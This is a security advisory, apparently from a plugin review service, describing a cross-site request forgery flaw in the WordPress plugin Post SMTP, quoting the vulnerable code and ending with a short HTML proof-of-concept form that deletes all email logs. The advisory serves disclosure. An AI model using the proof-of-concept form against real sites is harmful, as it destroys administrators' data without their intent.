Cross-Site Request Forgery (CSRF) Vulnerability in Post SMTP
As part of the security review of the plugin Post SMTP that we did after it was selected for a review by our customers we found the plugin contains a cross-site request forgery (CSRF) vulnerability that would cause all of the plugin’s email logging to be deleted.
The plugin’s Email Log admin page is accessible to those with the plugin’s MANAGE_POSTMAN_CAPABILITY_LOGS:
305 | $page = add_submenu_page( PostmanViewController::POSTMAN_MENU_SLUG, $pageTitle, $pluginName, Postman::MANAGE_POSTMAN_CAPABILITY_LOGS, 'postman_email_log', array( $this, 'postman_render_email_page' ) ); |
By default only Administrators have that.
When accessing that page the function postman_render_email_page() is called, which in turn calls the function prepare_items():
336 337 338 339 340 341 342 | function postman_render_email_page() { // Create an instance of our package class... $testListTable = new PostmanEmailLogView(); wp_enqueue_script( 'postman_resend_email_script' ); // Fetch, prepare, sort, and filter our data... $testListTable->prepare_items(); |
In that function if the POST input “postman_trash_all” exists all of the log files will be deleted:
351 352 353 | if ( isset( $_POST['postman_trash_all'] ) ) { foreach ( $posts->posts as $post ) { wp_delete_post( $post->ID, true ); |
No check for a valid nonce is done before that happens, so an attacker could cause a logged in Administrator to cause the deletion to happen without them intending it.
Proof of Concept
The following proof of concept will delete all of the email logging.
Make sure to replace “[path to WordPress]” with the location of WordPress.
<html> <body> <form action="http://[path to WordPress]/wp-admin/admin.php?page=postman_email_log" method="POST"> <input type="hidden" name="postman_trash_all" /> <input type="submit" value="Submit" /> </form> </body> </html>
Timeline
8/5/2019 – Developer notified.